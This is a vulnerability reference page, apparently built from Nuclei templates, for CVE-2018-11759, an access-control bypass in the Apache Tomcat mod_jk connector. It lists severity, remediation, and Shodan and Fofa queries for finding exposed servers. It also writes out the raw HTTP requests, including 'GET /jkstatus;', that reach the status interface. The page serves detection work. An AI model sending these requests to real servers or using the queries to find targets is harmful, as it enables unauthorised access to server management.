🔙 목록으로 돌아가기

CVE-2018-11759: Apache Tomcat JK Connect <=1.2.44 - Manager Access

TitleApache Tomcat JK Connect <=1.2.44 - Manager Access
Authorharshbothra_
SeverityHigh
ImpactUnauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server.
RemediationUpgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches.
CVSS Score7.5
EPSS Score0.94254
CVE IDCVE-2018-11759
CWE IDCWE-22
Shodan Querytitle:"Apache Tomcat"http.title:"apache tomcat"
Fofa Querytitle="apache tomcat"
Tags cve2018 cve apache tomcat httpd mod-jk vkev vuln

🔍 Vulnerability Description

Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.

🌐 HTTP Request

GET /jkstatus HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /jkstatus; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-11759.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-11759.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A